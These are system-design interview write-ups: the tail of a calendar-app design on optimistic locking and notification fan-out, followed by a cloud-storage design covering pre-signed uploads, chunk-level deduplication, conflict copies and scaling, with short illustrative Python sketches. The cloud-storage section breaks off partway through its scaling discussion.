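The two occurrences resolve to different UTC hours, which is why recurring series need the timezone name and not just a stored UTC start.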

9.5 Backend: Consistency, Conflict Resolution & Notification Fan-Out

Here's the problem we're solving: The backend has three non-trivial responsibilities that are easy to underestimate: (1) preventing lost updates when two users edit the same event concurrently, (2) ensuring event writes are ACID so attendee lists never get corrupted, and (3) fanning out notifications efficiently when a shared calendar event is modified.

Consistency — Why PostgreSQL, not a NoSQL store:

Calendar events have relational integrity requirements: an event belongs to a calendar, a calendar has members with roles, an event has attendees. A write that adds an attendee must also check the user's permission level. These multi-table constraints require ACID transactions — not eventual consistency.

At 167K writes/sec, a PostgreSQL cluster sharded by user_id handles this comfortably. Each shard owns a user's events, and most reads stay on one shard: a user reads only their own calendars plus the ones explicitly shared with them.

Conflict Resolution — Concurrent edits to a shared event:

Problem: User A and User B both open the same shared meeting. A changes the title; B changes the time — simultaneously. Both fire PATCH /events/:id. The second write wins silently. Neither user knows their collaborator was editing at the same time.

Chosen solution — optimistic locking with version field:

Every event row has a version integer.
PATCH /events/:id must include the version the client last saw.
Event Service: UPDATE events SET ..., version = version+1 WHERE event_id = :id AND version = :clientVersion.
If rows updated = 0 → version mismatch → return 409 Conflict.
Client receives 409 → fetches latest event state → shows diff to user → user resolves.

For calendar events (unlike Google Docs), last-write-wins is often acceptable — two people rarely edit the same 30-minute meeting simultaneously. Optimistic locking adds safety without the complexity of OT/CRDT.
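The version check is a single conditional UPDATE. The sketch below runs it against an in-memory SQLite database as a stand-in for PostgreSQL; the table layout and the `patch_event` helper are assumptions for illustration, and only the title is patched to keep it short.

```python
import sqlite3


def patch_event(conn, event_id, client_version, title):
    """Return 200 on success, or 409 when the client's version is stale.

    A real service would also distinguish a missing event (404);
    this sketch treats any zero-row update as a conflict.
    """
    cur = conn.execute(
        "UPDATE events SET title = ?, version = version + 1 "
        "WHERE event_id = ? AND version = ?",
        (title, event_id, client_version),
    )
    conn.commit()
    return 200 if cur.rowcount == 1 else 409


conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE events (event_id TEXT PRIMARY KEY, title TEXT, version INTEGER)")
conn.execute("INSERT INTO events VALUES ('e1', 'Standup', 1)")

# Both users loaded version 1; only the first PATCH matches the WHERE clause.
first = patch_event(conn, "e1", 1, "Standup (room 4)")
second = patch_event(conn, "e1", 1, "Daily sync")
```

The second caller receives 409, refetches the event at version 2, and retries with the new version.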

Notification Fan-Out — Shared calendars with many members:

Problem: A company-wide "All Hands" calendar has 5,000 members. One edit → must push WebSocket notification to up to 5,000 active connections. Doing this synchronously in the Event Service blocks the write path.

Chosen solution — Kafka + Notification Service:

Event Service writes to PostgreSQL, then publishes { eventId, calendarId, changes } to Kafka topic calendar-events. Write path done — returns 200 to client immediately.
Notification Service (separate process) consumes from Kafka. Looks up calendarId → [userId, ...] from Calendar Members table (cached in Redis, TTL = 10min).
For each member: check if they have an active WebSocket connection via ws-sessions:{userId} in Redis. If yes, route to the correct WS server node via Redis pub/sub and push the event.
Offline members: skip WS push. On their next day-view load, they'll fetch fresh data from PostgreSQL.

This decouples the write path from notification delivery. A 5,000-member calendar generates 5,000 WS pushes — but that's Notification Service's problem, not Event Service's.

[!NOTE]
Key Insight: The backend's job is consistency + fan-out, not layout or rendering. PostgreSQL gives ACID. Optimistic locking resolves concurrent edits. Kafka decouples the write path from the notification path — Event Service never waits for 5,000 WS pushes.

10. Bottlenecks & Scaling

What breaks first at 10× scale:

Event Service write path — 1.67M writes/sec. Single PostgreSQL primary caps at ~50–100K writes/sec.
- Shard by user_id (or calendar_id). Events are never queried cross-user — sharding is clean.
- Each shard = independent PostgreSQL primary + 2 read replicas.
Notification fan-out for shared calendars: when a user edits a recurring event with 500 attendees, Notification Service must push to 500 WebSocket connections.
- Kafka topic partitioned by calendar_id. Each Notification Service instance handles a partition. Scales horizontally.
- WebSocket server cluster: Redis pub/sub routes messages to the correct WS server node holding each connection.
Day view cache: 50M concurrent users each load ~20 events. At 3–5 API calls per load, and assuming as a worst case that every user loads once per second, that's 150–250M reads/sec.
- Cache recent day views in Redis: key = events:{userId}:{date}, TTL = 5 minutes.
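- Cache invalidation: when an event is written, invalidate all affected users' date keys. This is cheap for typical events, which are rarely shared with more than 10 users. A 5,000-member calendar would mean 5,000 invalidations per edit, so for those, letting the 5-minute TTL expire is the cheaper option.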

CDN strategy: All static assets (JS, CSS, fonts) served from CDN edge. First load: 200ms. Subsequent loads: service worker cache → near-instant.

11. Failure Scenarios

Failure	Impact	Recovery
PostgreSQL primary fails	Event writes fail; reads continue from replica	Automatic failover (Patroni / RDS Multi-AZ). Reads never interrupted.
WebSocket server node fails	~N/totalNodes users lose real-time updates	Client reconnects with exponential backoff. WS session map in Redis allows reconnection to any node.
Kafka consumer lag	Real-time updates delayed (seconds to minutes)	Backpressure alert. Consumer auto-scales. Events are durable in Kafka — no loss, just delay.
PATCH fails on drag drop	Event appears moved in client but not saved	Optimistic update reverts. User sees error toast: "Failed to save — changes reverted."
Clock skew between clients	Client timestamps cannot order concurrent edits to the same event	Ordering relies on the server-side version check, not client clocks: the stale PATCH gets 409 Conflict and the client refetches.
CDN outage	Initial load fails or is slow	API Gateway serves static assets as fallback (slower but functional).

12. Trade-offs

Optimistic UI vs. Confirmed Update

Dimension	Optimistic UI	Wait for confirmation
Perceived latency	Instant (0ms)	Full round-trip (100–300ms)
Risk	Revert on failure (jarring UX)	No visual inconsistency
Complexity	Rollback logic required	Simple
User experience	Smooth, modern feel	Laggy on slow networks

Chosen: Optimistic UI — calendar events rarely fail to save. The latency improvement (0ms vs 200ms) is significant at scale and across mobile connections.

[!NOTE]
Key Insight: Optimistic UI is only viable when the failure rate is low and rollback is well-defined. Event drag-and-drop fails <0.1% of the time — making it the ideal candidate.

WebSocket vs. Polling for Real-Time Sync

Dimension	WebSocket	Polling (fixed interval)
Real-time latency	< 100ms	1–30s
Server connections	Persistent (expensive)	Stateless (cheaper per req)
Scale complexity	Need WS cluster + Redis routing	Any stateless server
Bandwidth	Low (push only changed data)	Higher (repeated full requests)

Chosen: WebSocket. For collaborative calendars, sub-second update latency is the UX requirement. Polling at 1-second intervals for 500M users = 500M requests/sec, nearly all of them empty. That math does not work.

[!NOTE]
Key Insight: WebSocket vs polling is a math problem. 500M users × 1 poll/sec = 500M empty requests/sec. WebSocket = push only when something changes.

Recurring Event Storage: Pre-Expand vs. Rule + Expand

Dimension	Pre-expand rows	RRULE rule + expand on read
Read complexity	Simple SQL range query	RRULE library call
Write complexity	Simple	Simple
Storage	O(n × recurrences) = billions of rows	O(n) — one row per recurring series
Handling exceptions	Update single row	Exception table lookup
Handling "edit all future"	Update many rows	Update UNTIL + new rule row

Chosen: RRULE rule + expand on read — storage efficiency is overwhelming at 500M users. RRULE expansion for a single day is O(1) — trivial cost.

[!NOTE]
Key Insight: Expand at read time for a 24-hour window = at most 2–3 occurrences per series. Pre-expand for 2 years = 104 rows (weekly) to 730 rows (daily) per event. The read cost is comparable; the write/storage cost is radically different.

Interview Summary

Key Decisions

Decision	Problem it solves	Trade-off accepted
Optimistic UI for drag & drop	Instant visual feedback; 60fps drag	Must implement rollback on API failure
DOM mutation during drag (not React state)	60fps without re-render bottleneck	DOM temporarily out of sync with React virtual DOM
RRULE rule + expand on read	O(n) storage instead of O(n × recurrences)	RRULE expansion logic in service layer on every read
WebSocket over polling	< 1s real-time updates	Stateful server cluster; Redis routing needed
UTC storage + client-side timezone render	Single source of truth; no timezone bugs	Client must handle DST-aware display logic
PostgreSQL with sharding	ACID for event CRUD; prevents double-booking	Shard key must be chosen carefully (user_id)

Fast Path vs. Reliable Path

FAST PATH (optimized for perceived latency)
  User drags event
      │
      ▼
  DOM translate (60fps, no React re-render)
      │
  User drops
      │
      ▼
  React state update → event renders at new time immediately
      │
  PATCH /events/:id fires async (non-blocking)


RELIABLE PATH (optimized for correctness)
  If PATCH succeeds → collaborators receive WS push → re-render
  If PATCH fails   → revert React state → event snaps back → error toast

Key Insights Checklist

"Drag at 60fps requires bypassing React. I mutate the DOM directly during drag, commit once on drop. DOM and React are briefly out of sync — that's acceptable because the window is bounded and intentional."
"Recurring events are a read-time computation problem, not a storage problem. Store the RRULE rule, not the expanded instances. One row per series. Expansion for a single day-view window yields only a handful of occurrences."
"WebSocket vs polling is a math problem. 500M users × 1 poll/sec = 500M empty requests/sec. Pushed updates from WebSocket cost nothing when nothing changes."
"Optimistic UI only works when failure rate is low and rollback is well-defined. Calendar drag-and-drop fails < 0.1% of the time — making it the ideal use case."
"All event instants are stored in UTC and rendered in the viewer's timezone on the client. Recurring series also keep their IANA timezone so that a 9 AM weekly event stays at 9 AM local across DST transitions."
"Overlapping event layout is a greedy column-packing algorithm — runs client-side in O(n log n). The API returns raw times; the client computes visual positions. This lets mobile and web implement different strategies independently."

Cloud Storage (Google Drive / Dropbox)

Arghya Majumder — Sat, 28 Mar 2026 00:31:23 +0000

System Design: Cloud Storage (Google Drive / Dropbox)

1. Problem + Scope

Design a cloud storage platform (Google Drive / Dropbox) supporting file upload, download, sync across devices, folder management, and sharing with permissions — at 50 million DAU storing 10 billion files.

In Scope: File and folder upload/download, auto-sync across devices, directory structure (create/delete/rename/move), file sharing with read/write permissions, storage quota per user, chunk-level deduplication.

Out of Scope: Real-time collaborative editing (separate system — see google-docs.md), video transcoding, full-text search within documents, virus scanning internals, mobile offline-first CRDT sync.

2. Assumptions & Scale

Active users:           50 million DAU
Files per user:         ~200 average
Total files:            10 billion
Daily uploads:          50 million files/day
Average file size:      500 KB
Large files (>10 MB):   5% of uploads = 2.5 million/day

Storage:
  New data/day:   50M files x 500KB = 25 TB/day
  After dedup:    ~60% unique (Dropbox reports ~70% dedup ratio)
                  -> ~15 TB/day net new storage
  5-year total:   15 TB x 365 x 5 = ~27 PB

Upload throughput:
  50M uploads/day / 86,400s = ~580 uploads/sec average
  Peak (10x):              ~5,800 uploads/sec

Metadata reads (folder browsing):
  50M DAU x 20 opens/day = 1B reads/day = ~11,500 reads/sec

Chunk operations:
  Large file (1 GB) = 1 GB / 5 MB chunk = 200 chunks
  5,800 uploads/sec x ~5 chunks avg = ~29,000 chunk uploads/sec
  -> S3 must handle ~29K PUT requests/sec

Sync notifications:
  50M uploads/day -> fan-out to avg 3 devices = 150M notifications/day
  -> ~1,700 WebSocket pushes/sec (manageable with pub/sub)

These numbers drive the following decisions: pre-signed URLs (the app tier should not proxy 25 TB/day), chunk-level dedup (cuts roughly 46 PB of raw uploads over 5 years to ~27 PB stored), PostgreSQL sharding (580 writes/sec is well within range; PostgreSQL is chosen because the metadata is relational), and WebSocket + message queue for sync (1,700 pushes/sec is lightweight but must survive upload service restarts).
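The estimates above are easy to reproduce, which helps when an interviewer changes one input. The snippet below only restates the article's assumptions (decimal units, 60% unique bytes, 3 devices per user); the variable names are illustrative.

```python
SECONDS_PER_DAY = 86_400

uploads_per_day = 50_000_000
avg_file_kb = 500
unique_fraction = 0.60   # share of uploaded bytes still stored after dedup
devices_per_user = 3
peak_factor = 10

raw_tb_per_day = uploads_per_day * avg_file_kb / 1e9   # KB -> TB, decimal units
net_tb_per_day = raw_tb_per_day * unique_fraction

five_year_pb_raw = raw_tb_per_day * 365 * 5 / 1000
five_year_pb_net = net_tb_per_day * 365 * 5 / 1000

avg_uploads_per_sec = uploads_per_day / SECONDS_PER_DAY
peak_uploads_per_sec = avg_uploads_per_sec * peak_factor
ws_pushes_per_sec = uploads_per_day * devices_per_user / SECONDS_PER_DAY

print(f"raw {raw_tb_per_day:.0f} TB/day, net {net_tb_per_day:.0f} TB/day")
print(f"5-year: {five_year_pb_raw:.1f} PB raw vs {five_year_pb_net:.1f} PB stored")
print(f"uploads/sec: {avg_uploads_per_sec:.0f} avg, {peak_uploads_per_sec:.0f} peak")
print(f"WebSocket pushes/sec: {ws_pushes_per_sec:.0f}")
```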

3. Functional Requirements

User creates an account and gets a storage quota (e.g., 15 GB free)
Upload files and folders of any size, including multi-GB videos
Download files from any device and location
Auto-sync: all connected devices update within 2 seconds when any device changes a file
Share files and folders with other users; assign read or write permission
Directory operations: create, rename, delete, and move folders and files
Resume interrupted uploads — a failed chunk does not restart the whole file
Storage deduplication — identical content stored only once regardless of who uploaded it

4. Non-Functional Requirements

Requirement	Target
Availability	99.99% — prefer AP over CP for upload and sync
Durability	99.999999999% (11 nines) — replicated across AZs in S3
Upload latency	Bounded by client bandwidth — backend adds less than 100ms overhead
Sync latency	Less than 2 seconds after upload completes
Metadata read latency	Less than 50ms p99 for folder listing
Consistency — metadata	Strong (ACID) for quota enforcement and permission checks
Consistency — sync	Eventual — 1–2 second lag between devices is acceptable
Large file support	Files up to 15 GB via chunked multipart upload
Storage efficiency	Chunk-level dedup targeting 60–70% reduction

Consistency Model

Domain	Model	Reason
Quota enforcement	Strong (ACID)	User must never exceed quota; two concurrent uploads need serialization
Permission checks	Strong (ACID)	Access control must be correct at all times
Folder listing	Eventual (read replica)	1–2s stale list is invisible to users
Cross-device sync	Eventual	Notification-driven pull; brief lag acceptable

[!IMPORTANT]
CAP framing: Upload and sync prefer availability — a 1–2 second sync lag is acceptable. Quota and permission operations prefer consistency — a user must never exceed quota or access a file they were not granted permission to.
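One way to serialize two concurrent uploads against the same quota is to fold the check into the UPDATE itself, so the database decides atomically. This is a sketch under assumptions: SQLite stands in for PostgreSQL, and the `users` table and `reserve_quota` helper are hypothetical names.

```python
import sqlite3


def reserve_quota(conn, user_id, size_bytes):
    """Add size_bytes to bytes_used unless that would exceed the quota."""
    cur = conn.execute(
        "UPDATE users SET bytes_used = bytes_used + ? "
        "WHERE user_id = ? AND bytes_used + ? <= quota_bytes",
        (size_bytes, user_id, size_bytes),
    )
    conn.commit()
    # Zero rows updated means the upload does not fit (or the user is unknown).
    return cur.rowcount == 1


conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE users (user_id TEXT PRIMARY KEY, bytes_used INTEGER, quota_bytes INTEGER)"
)
conn.execute("INSERT INTO users VALUES ('u1', 0, 15000000000)")  # 15 GB free tier

first_upload = reserve_quota(conn, "u1", 10_000_000_000)
second_upload = reserve_quota(conn, "u1", 10_000_000_000)  # would total 20 GB
```

Because the comparison and the increment happen in one statement, two uploads racing for the last few gigabytes cannot both succeed.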

🧠 Mental Model

A cloud storage system is not just a file store — it continuously syncs file state across distributed clients, ensuring changes propagate reliably and efficiently. Three flows define everything: upload (client chunks file → pre-signed URL → S3 directly), metadata management (DB tracks what exists, not the bytes), and sync (S3 event → notification service → WebSocket push to other devices). The file bytes and the file record travel completely separate paths.

Google Drive is not a filesystem. It is a metadata store with a blob storage backend.

A "folder" is not a directory — it is a row in a database with type = folder. Moving a file is not moving bytes — it is changing a parent_id field. The actual bytes live in S3, addressed by a content hash.

                    +-----------------------------------------------------+
                    |                    FAST PATH                        |
  +--------+  chunk |  +----------------+   pre-signed URL               |
  | Client | ------>|  | Upload Service | ---------------------> S3/Blob |
  |(Chunker|        |  +-------+--------+   client uploads directly      |
  |+Watcher|        +----------|-----------------------------------------+
  +--------+                   | metadata write (before ACK)
                    +----------v-----------------------------------------+
                    |                  RELIABLE PATH                      |
                    |  Metadata DB (file record, hash, parent_id, quota)  |
                    |  Notification Service --> sync other devices        |
                    +-----------------------------------------------------+

⚡ Core Design Principles

Path	Optimized For	Mechanism
Fast Path — upload	Throughput	Pre-signed URL; client uploads chunks directly to S3; backend touches zero bytes
Reliable Path — metadata	Durability + Correctness	DB write before upload confirmed; quota enforced atomically
Dedup Path — storage	Efficiency	SHA-256 chunk hash = content-addressable key; second upload = metadata pointer only
Sync Path — devices	Near-real-time	S3 event → MQ → Notification Service → WebSocket push; pull-on-notification

[!IMPORTANT]
File data never touches the application server. The backend only handles metadata and issues pre-signed tokens. File bytes go client → S3 directly. This is the architectural decision that makes Google Drive scale — the upload bottleneck is the client's bandwidth and S3 throughput, not application server capacity.

[!NOTE]
Key Insight: Deduplication works at the chunk level, not the file level. If you upload the same 10 GB video twice, only one copy of each chunk is stored. The second upload is just a metadata pointer — no bytes transferred. This is why Dropbox could serve billions of files at a fraction of expected storage cost.

6. API Design

Method	Path	Description
POST	/api/v1/files/upload/init	Initiate chunked upload, returns {upload_id, pre_signed_urls[]}
POST	/api/v1/files/upload/complete	Confirm all chunks uploaded, triggers processing
GET	/api/v1/files/{id}/download	Returns pre-signed S3 download URL (not the file bytes)
GET	/api/v1/folders/{id}/children	List folder contents with metadata
POST	/api/v1/files/{id}/share	Share with {email, permission: read/write}
GET	/api/v1/files/{id}/versions	List file version history

[!NOTE]
The most architecturally interesting endpoints are upload/init and download — neither passes file bytes through the app server. Upload/init returns pre-signed S3 URLs so the client uploads directly to S3. Download returns a pre-signed URL the client fetches directly from CDN. The app server only handles metadata.

7. End-to-End Flow

7.1 Upload Flow

File upload with pre-signed URL and chunk deduplication — the happy path from client to sync.

The story in plain English:

Client initiates upload by calling POST /files/upload/init with the file name, size, a SHA-256 hash of the entire file, and the SHA-256 hash of each chunk.
Upload Service checks which of those chunk hashes already exist in storage (chunk-level deduplication). If another user already uploaded the same content, those chunks are skipped entirely.
For chunks that don't exist yet, the server generates pre-signed S3 PUT URLs — one per chunk — and returns them to the client.
The client uploads each chunk directly to S3 in parallel. The app server never touches file bytes. This is how you scale uploads without server bottleneck.
Once all chunks are uploaded, the client calls POST /files/upload/complete with the file_id and chunk ETags.
Upload Service commits the file metadata record to PostgreSQL — pointing to the chunk hashes in S3, not the file bytes directly.
A file_ready event is published to Kafka. Notification Service consumes it and pushes a sync event to the user's other devices via WebSocket.


GOOGLE DRIVE — FILE UPLOAD SEQUENCE
═══════════════════════════════════════════════════════════════════════════════

  Client      Upload Svc    Dedup Check      S3         Message Q    Notify Svc
    │               │              │           │               │            │
    │─POST /files/upload/init──────►           │               │            │
    │  {name, size, chunk_count,   │           │               │            │
    │   total_hash, chunk_hashes[]}│           │               │            │
    │               │─which chunk hashes exist?►│              │            │
    │               │◄─────[no: new] / [partial: some chunks exist]          │
    │               │─check user quota          │              │            │
    │               │─generate pre-signed PUT URLs for NEW chunks only───────►
    │               │◄──────────────────────────│              │            │
    │◄──────────────│ {file_id, upload_id,       │             │            │
    │  pre_signed_urls[] for unique chunks}      │             │            │
    │               │              │             │             │            │
    │               │   ┌──────────────────────────────────────────────────┐ │
    │               │   │  Client uploads ONLY new chunks directly to S3   │ │
    │               │   │  (parallel, bypasses app server entirely)        │ │
    │               │   └──────────────────────────────────────────────────┘ │
    │─PUT chunk_1 (pre-signed URL)──────────────►│               │            │
    │─PUT chunk_2 (pre-signed URL)──────────────►│               │            │
    │─PUT chunk_N (pre-signed URL)──────────────►│               │            │
    │               │              │            │─upload_completed events───►│
    │               │              │            │  {file_id, chunk_ids}│
    │               │◄─────────────────────────────consume + verify chunks──│
    │─POST /files/upload/complete───►            │               │            │
    │  {file_id, etags[]}           │            │               │            │
    │               │─commit file_metadata to DB │               │            │
    │               │  (points to chunk hashes,  │               │            │
    │               │   not raw bytes)           │               │            │
    │               │─decrement user quota atomically            │            │
    │◄──────────────│ 200 OK {download_url}       │              │            │
    │               │               │             │              │            │
    │               │─file_ready event──────────────────────────►│            │
    │               │  {user_id, file_id}       │               │─consume───►│
    │               │              │            │               │─WS push────►
    │               │              │            │               │  sync file_id
    │               │              │            │               │  to other   │
    │               │              │            │               │  devices    │

[!NOTE]
Key Insight: The 3-step upload (initiate → upload to S3 → complete) is the correct pattern for large files. The backend never touches file bytes — it only creates pre-signed URLs and records metadata on completion. This is how you scale to 5,800 uploads/sec without application server bottleneck.

7.2 Download Flow

File download with permission check and pre-signed CDN/S3 URL — the client fetches bytes directly, never through the app server.

The story in plain English:

User clicks a file — client calls GET /files/{id}/download.
Metadata Service checks Redis cache for file metadata (name, size, S3 location). Cache hit returns in < 1ms. Cache miss falls back to PostgreSQL.
Permission Service checks that this user has at least read access to the file (via the permissions table).
Metadata Service generates a pre-signed S3/CDN GET URL with a short TTL (15 minutes) and returns it to the client.
Client fetches the file directly from the CDN edge node — the app server is completely out of the data path.
CDN cache hit: file served from edge in milliseconds. Cache miss: CDN fetches from S3 origin, caches at edge for future requests. The app server never touches file bytes in either direction — upload or download.

[!NOTE]
Key Insight: The app server never touches file bytes in either direction — upload bytes go Client → S3 directly via pre-signed PUT, download bytes go S3/CDN → Client directly via pre-signed GET. The app server is purely a metadata and URL-signing service.

8. High-Level Architecture

Simple Design

Evolved Design — with CDN, Dedup, Sync Queue

9. Data Model

Entity	Storage	Key Columns	Why this store
file_metadata	PostgreSQL	file_id UUID PK, name, type, parent_id FK, owner_id, size_bytes, content_hash, s3_path, created_at, modified_at, deleted_at	Relational — parent-child folder hierarchy, soft deletes, O(1) rename and move via single field update
chunks	PostgreSQL	chunk_hash SHA-256 PK, s3_path, size_bytes, ref_count, created_at	Content-addressable: hash IS the key; ref_count enables garbage collection of orphaned chunks
file_chunks	PostgreSQL	file_id FK, chunk_index, chunk_hash FK	Join table mapping a file to its ordered list of chunk hashes; enables partial dedup per file
permissions	PostgreSQL	file_id FK, user_id FK, permission enum read/write/owner, granted_at — PK is file_id + user_id	ACID required — permission checks must be strongly consistent; JOIN with file_metadata is natural SQL
sync_state	Redis	user_id → set of device_ws_ids, TTL 30min	Ephemeral — tracks which WebSocket connections belong to a user; TTL handles disconnects automatically
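quota_cache	Redis	user_id → bytes_used, TTL 60s	Read cache for quota display and fast pre-checks, where up to 60s of staleness is acceptable. The DB is the source of truth, and the authoritative quota check runs in the PostgreSQL transaction at upload completion.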
user_sessions	Redis	session_token → user_id, TTL 24h	Session data is ephemeral and high-read; Redis sub-millisecond lookup vs 10–50ms DB I/O

[!NOTE]
Key Insight: The chunks table makes the hash the primary key — the content IS the address. Deduplication, integrity checking, and content-addressable retrieval are all solved by the same SHA-256 hash. No separate dedup service state is needed.

10. Deep Dives

10.1 Pre-Signed URL Upload Flow

Here is the problem: at peak load, 5,800 uploads/sec at an assumed ~2.5 MB transferred per upload means 14.5 GB/sec of file data in flight. Routing this through application servers would require provisioning server capacity for a problem that is purely about moving bytes from one place to another.

Naive solution: Client POSTs file bytes to /files/upload → server streams to S3. This fails because: (1) server holds the TCP connection open for the entire upload duration — 200 MB file on a slow connection = 30+ seconds of connection held, (2) 25 TB/day through app servers = bandwidth cost and compute cost that scales linearly with file size, not with request count.

Chosen solution — 3-step pre-signed URL flow:

Client calls POST /files/upload/init with file metadata and chunk hashes. Backend checks quota and dedup, then generates pre-signed PUT URLs: time-limited tokens (15 min), each scoped to exactly one S3 object. Signing happens locally with the service's credentials, so no request to S3 is needed to mint a URL.
Client uploads each chunk byte-for-byte directly to S3 using the pre-signed URL. Backend is not involved. S3 validates the token and stores the chunk.
Client calls POST /files/upload/complete with file_id and chunk ETags. Backend writes the metadata record to PostgreSQL and decrements quota atomically.

Trade-off accepted: Client must implement a 3-step upload flow instead of a simple POST. This is acceptable because the client SDK abstracts the flow — users never see it — and the alternative (proxying 25 TB/day) is not an optimization problem but a physics problem.

[!IMPORTANT]
Pre-signed URLs are not just an optimization — they are the only architecture that scales. Proxying 25 TB/day of file uploads through application servers cannot be fixed with more hardware; it requires re-routing the data path entirely.

[!TIP]
In the interview, say: "I chose pre-signed URLs over proxied upload because routing 14.5 GB/sec through application servers creates a bottleneck that cannot be horizontally scaled away — you would need servers sized for bandwidth, not compute. The trade-off I accept is a 3-step client flow, which is hidden inside the SDK."
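What makes a pre-signed URL safe to hand to a client is that it is a signature over the method, the object key, and an expiry time. The sketch below shows that idea with a plain HMAC. It is a simplified stand-in and not AWS Signature Version 4; the secret, the `blob.example.com` host, and both function names are hypothetical.

```python
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlsplit

SECRET = b"demo-signing-key"  # hypothetical; a real service signs with cloud credentials


def sign_put_url(object_key, ttl_seconds=900, now=None):
    """Mint a URL that authorizes one PUT to one object until it expires."""
    issued = time.time() if now is None else now
    expires = int(issued + ttl_seconds)
    message = f"PUT\n{object_key}\n{expires}".encode()
    signature = hmac.new(SECRET, message, hashlib.sha256).hexdigest()
    return f"https://blob.example.com/{object_key}?expires={expires}&sig={signature}"


def verify_put_url(url, now=None):
    """What the storage side would check before accepting the bytes."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    object_key = parts.path.lstrip("/")
    expires = int(query["expires"][0])
    current = time.time() if now is None else now
    if current > expires:
        return False  # token has expired
    message = f"PUT\n{object_key}\n{expires}".encode()
    expected = hmac.new(SECRET, message, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, query["sig"][0])
```

Changing the object key or replaying the URL after the 15-minute window both fail verification, and no application server sits in the data path for either check.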

10.2 Chunk-Level Deduplication via SHA-256

Here is the problem: 50 million uploads/day at 500 KB average = 25 TB/day of raw data. Many of those uploads share content — video edits share 90% of frames, document revisions share most paragraphs, backup tools re-upload unchanged files.

Naive solution — file-level dedup: Hash the whole file, check if hash exists. If yes, skip upload. This catches only exact duplicates — roughly 30% of uploads. Two versions of the same video (one with added intro) share no file hash even though they share 95% of bytes.

Chosen solution — chunk-level content-addressable storage:

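Every file is split into 5 MB chunks before upload. Each chunk is hashed with SHA-256 (collision probability negligible). When the client calls POST /files/upload/init, it sends the hash list for all chunks. The Upload Service queries the chunks table: which hashes already exist? For existing hashes, no pre-signed URL is issued; the file_chunks join table simply references the existing chunk. The client only uploads genuinely new chunks. One caveat: fixed-size chunks only match when the shared bytes sit at the same offsets. An insertion near the start of a file (the added-intro case above) shifts every later chunk boundary, so catching it requires content-defined chunking, where boundaries are chosen by a rolling hash of the content.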

The file_metadata record becomes a list of chunk_hashes in order: [hash_A, hash_B, hash_C]. To reconstruct the file on download, the client (or CDN) fetches chunks in order and concatenates.

Trade-off accepted: Higher metadata DB size. As an upper bound, ~100 bytes/chunk record × 200 chunks/file × 10B files = roughly 200 TB of chunk metadata; at the 500 KB average file size most files are a single chunk, which puts the figure closer to 1 TB. Either way it is a known, bounded cost, and chunk metadata is small and amenable to compression. The storage saved (about 18 PB over 5 years: ~46 PB raw versus ~27 PB stored) vastly outweighs the metadata overhead.

[!NOTE]
Key Insight: Chunk hashes are content-addressable. The hash IS the storage address. Two users uploading the same popular movie share all 200 chunks — only one copy on disk. Storage cost is amortized across all users. This is the reason Dropbox could undercut competitors on price.

10.3 Sync Conflict Resolution

Here is the problem: Device A and Device B both edit the same file while offline. Both upload when they reconnect. The server sees two uploads targeting the same file_id with the same base version but different content hashes. One of them must win — but silently discarding the other is data loss.

Naive solution — last-write-wins: The second upload overwrites the first. Simple to implement. Silently destroys data whenever two devices are offline simultaneously.

Chosen solution — conflict copy preservation:

Each file carries a version field incremented on every write. On POST /files/complete, the Upload Service checks: does the base_version in the request match the current version in DB? If yes, it is a clean update — increment version and commit. If no, there is a conflict.

On conflict, the server does not reject the upload. Instead it creates a second file_metadata record named file (Device B conflict copy YYYY-MM-DD).ext, pointing to Device B's chunk hashes. Both versions survive. The user sees both in the folder and can manually resolve.
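
A minimal sketch of the version check and conflict-copy path follows. It assumes an in-memory `dict` in place of the metadata DB; `FileRecord`, `complete_upload`, and the way `copy_id` is generated are hypothetical names chosen for illustration. In a real database the compare-and-increment would have to be a single atomic statement or transaction.

```python
import os
from dataclasses import dataclass
from datetime import date


@dataclass
class FileRecord:
    name: str
    version: int
    chunk_hashes: list


def complete_upload(files: dict, file_id: str, base_version: int,
                    chunk_hashes: list, device: str, today: date) -> str:
    """Commit an upload and return the id of the record that now holds the content."""
    current = files[file_id]
    if base_version == current.version:
        # Clean update: the client edited the latest version.
        current.chunk_hashes = chunk_hashes
        current.version += 1
        return file_id
    # Conflict: keep the existing record and store this upload as a sibling copy.
    stem, ext = os.path.splitext(current.name)
    copy_name = f"{stem} ({device} conflict copy {today.isoformat()}){ext}"
    copy_id = f"{file_id}-conflict-{len(files)}"  # hypothetical id scheme
    files[copy_id] = FileRecord(copy_name, 1, chunk_hashes)
    return copy_id
```

Two uploads with the same `base_version` therefore both survive: the first bumps the version, the second lands in a conflict copy.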

Trade-off accepted: Users must occasionally resolve conflicts manually. This is acceptable because: (1) conflicts only happen when two devices edit the same file offline simultaneously — rare in practice, (2) the alternative (silent data loss or distributed locks requiring both devices online) is worse. The conflict copy UI is a familiar pattern — users understand it.

[!NOTE]
Key Insight: Sync is pull-on-notification, not push. The notification tells the device "something changed." The device decides what to download. This prevents wasting bandwidth pushing large files to mobile devices on limited storage or slow connections.

11. Bottlenecks & Scaling

Bottleneck 1: Metadata DB read throughput (11,500 reads/sec for folder listing)

What breaks first: a single PostgreSQL primary cannot serve 11,500 read requests/sec at p99 less than 50ms while also handling 580 writes/sec for uploads.

Solution: Add read replicas for folder listing queries. Route all write operations (upload initiate, complete, quota update, permission change) to primary. Route all read operations (folder listing, file metadata fetch, permission check for download) to read replicas. Shard by owner_id — all files for one user land on the same shard, keeping parent-child queries local. Add Redis cache for hot folders (team shared drives with many readers).

Bottleneck 2: Notification service fan-out (1,700 WebSocket pushes/sec)

What breaks first: a single notification service node cannot maintain WebSocket connections for 50M DAU. At 3 devices per user, 50 million users hold 150M persistent connections.

Solution: Horizontal scaling of notification service nodes. Redis stores the mapping of user_id → set of device WebSocket connection IDs (with TTL for cleanup). Each notification service node holds a subset of connections. When a sync event arrives for user_id X, the service looks up X's device connection IDs in Redis and routes to the correct node. Nodes communicate via internal pub/sub.

Bottleneck 3: Chunk metadata lookup for dedup (29,000 chunk operations/sec)

What breaks first: checking 29K chunk hashes/sec against PostgreSQL for dedup will saturate the DB before the upload pipeline.

